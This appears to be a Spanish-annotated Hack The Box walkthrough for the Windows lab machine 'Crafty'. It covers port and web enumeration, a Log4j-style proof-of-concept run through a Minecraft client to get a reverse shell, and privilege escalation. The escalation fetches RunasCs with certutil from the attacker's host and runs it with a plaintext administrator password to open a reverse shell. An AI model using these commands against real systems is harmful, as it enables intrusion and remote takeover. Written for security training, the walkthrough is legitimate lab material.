Crafty
HTB Windows
nmap -A -p- -oA crafty 10.10.11.249 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA crafty 10.10.11.249
echo "10.10.11.249 crafty.htb play.crafty.htb" | sudo tee -a /etc/hosts
nmap -sU -O -p- -oA crafty-udp 10.10.11.249
ping -c 1 10.10.11.249
nmap -p- --open -T5 -v -n 10.10.11.249
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.249 -oG allPorts
extractPorts allPorts
nmap -sCV -p60,25565 10.10.11.249 -oN targeted
bc targeted -l rb
whatweb http://10.10.11.249
Vemos que abajo dice play.crafty.htb
gobuster dir -u http://10.10.11.249/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x html
http://github.com/MCCTeam/Minecraft-Console-Client/releases/tag/20240906-276
chmod +x MinecraftClient20240906-276-linux-x64
./MinecraftClient20240906-276-linux-x64
cu3rv0x
para la contrasena lo dejas vacio.
y el servidor es crafty.htb
Hacemos gitclone de lo siguiente:
bajamos el jdk que nos pide
Por si tienen problemas bajando el tar.gz
tar -xf jdk-8u202-linux-x64.tar.gz .
https://gist.github.com/wavezhang/ba8425f24a968ec9b2a8619d7c2d86a6?permalink_comment_id=3827557
Cambiamos la siguiente linea en poc.py
python3 poc.py --userip 10.10.14.7 --webport 8000 --lport 443
nc -lvnp 443
type user.txt
powershell
cp playercounter-1.0-SNAPSHOT.jar \\10.10.14.7\smbFolder\playercoutner.jar
jd-gui &> /dev/null & disown
Bajamos el siguiente zip
https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip
unzip RunasCs.zip
mkdir privesc
cd privesc
python3 -m http.server 80
certutil.exe -f -urlcache -split http://10.10.14.7/RunasCs.exe RunasCs.exe
.\RunasCs.exe administrator s67u84zKq8IXw cmd.exe -r 10.10.14.7:443
rlwrap nc -lnvp 443
type C:\Users\Administrator\Desktop\root.txt
